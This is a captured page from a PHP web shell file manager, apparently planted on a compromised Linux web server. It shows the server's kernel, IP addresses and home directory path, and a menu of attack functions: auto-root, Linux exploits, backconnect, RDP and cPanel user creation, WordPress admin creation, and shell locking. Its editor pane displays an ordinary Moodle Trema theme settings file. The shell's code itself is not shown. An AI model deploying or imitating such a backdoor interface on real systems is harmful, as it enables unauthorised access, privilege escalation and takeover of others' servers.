Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.27
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
theme /
trema /
settings /
[ HOME SHELL ]
Name
Size
Permission
Action
content_settings.php
10.71
KB
-rw-r--r--
general_settings.php
5.52
KB
-rw-r--r--
login_settings.php
2.77
KB
-rw-r--r--
styleguide_settings.php
1.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : general_settings.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * General settings * * @package theme_trema * @copyright 2019 Trema - {@link https://trema.tech/} * @author Rodrigo Mady * @author Trevor Furtado * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ defined('MOODLE_INTERNAL') || die(); $page = new admin_settingpage('theme_trema_general', get_string('generalsettings', 'theme_trema')); // Preset. $name = 'theme_trema/preset'; $title = get_string('preset', 'theme_trema'); $description = get_string('preset_desc', 'theme_trema'); $default = 'trema.scss'; // These are the built in presets. $choices = [ 'trema.scss' => 'trema.scss', 'plain.scss' => 'plain.scss' ]; $setting = new admin_setting_configthemepreset($name, $title, $description, $default, $choices, 'trema'); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // Favicon image setting. $name = 'theme_trema/favicon'; $title = get_string('favicon', 'theme_trema'); $description = get_string('favicon_desc', 'theme_trema'); $setting = new admin_setting_configstoredfile($name, $title, $description, 'favicon'); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // We use an empty default value because the default colour is defined in scss/defaultvariables. $name = 'theme_trema/primarycolor'; $title = get_string('primarycolor', 'theme_trema'); $description = get_string('primarycolor_desc', 'theme_trema'); $setting = new admin_setting_configcolourpicker($name, $title, $description, '#FD647A'); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // We use an empty default value because the default colour is defined in scss/defaultvariables. $name = 'theme_trema/secondarycolor'; $title = get_string('secondarycolor', 'theme_trema'); $description = get_string('secondarycolor_desc', 'theme_trema'); $setting = new admin_setting_configcolourpicker($name, $title, $description, '#373A3C'); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // Navbar - show my courses. $choices = array( 0 => "don't show", -10000 => "show left", 10000 => "show right", ); $setting = new admin_setting_configselect('theme_trema/showmycourses', new lang_string('showmycourses', 'theme_trema'), new lang_string('showmycourses_desc', 'theme_trema'), 'show left', $choices); $page->add($setting); $name = 'theme_trema/enableadmindashboard'; $title = get_string('enableadmindashboard', 'theme_trema'); $description = get_string('enableadmindashboard_desc', 'theme_trema', "$CFG->wwwroot/theme/trema/pix/examples/admindashboard.png"); $setting = new admin_setting_configcheckbox($name, $title, $description, '1'); $page->add($setting); $name = 'theme_trema/enabletrematopics'; $title = get_string('enabletrematopics', 'theme_trema'); $description = get_string('enabletrematopics_desc', 'theme_trema', "$CFG->wwwroot/theme/trema/pix/examples/trematopics.png"); $setting = new admin_setting_configcheckbox($name, $title, $description, '1'); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // HTML to include in the footer content of frontpage. $footerhtml = '<div class="row"> <div class="col-md-8"> <h3 class="-align-center">Trema Soluções em Tecnologia</h3> </div> <div class="col-md-4"> <h3>Contact Us</h3> <ul class="labeled-icons"> <li> <span class="fa fa-globe" aria-hidden="true"></span> <a href="https://trema.tech/" target="_blank">https://trema.tech/</a> </li> <li> <span class="fa fa-github" aria-hidden="true"></span> <a href="https://github.com/trema-tech/" target="_blank">https://github.com/trema-tech/</a> </li> </ul> </div> </div>'; $setting = new admin_setting_confightmleditor('theme_trema/defaultfooter', get_string('defaultfooter', 'theme_trema'), get_string('defaultfooter_desc', 'theme_trema'), $footerhtml, PARAM_RAW); $page->add($setting); $name = 'theme_trema/enablefooterinfo'; $title = get_string('enablefooterinfo', 'theme_trema'); $description = get_string('enablefooterinfo_desc', 'theme_trema', "$CFG->wwwroot/theme/trema/pix/examples/footerinfo.png"); $setting = new admin_setting_configcheckbox($name, $title, $description, '1'); $page->add($setting); // Raw SCSS to include before the content. $setting = new admin_setting_scsscode('theme_trema/scsspre', get_string('rawscsspre', 'theme_trema'), get_string('rawscsspre_desc', 'theme_trema'), '', PARAM_RAW); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // Raw SCSS to include after the content. $setting = new admin_setting_scsscode('theme_trema/scss', get_string('rawscss', 'theme_trema'), get_string('rawscss_desc', 'theme_trema'), '', PARAM_RAW); $setting->set_updatedcallback('theme_reset_all_caches'); $page->add($setting); // Must add the page after definiting all the settings! $settings->add($page);
Close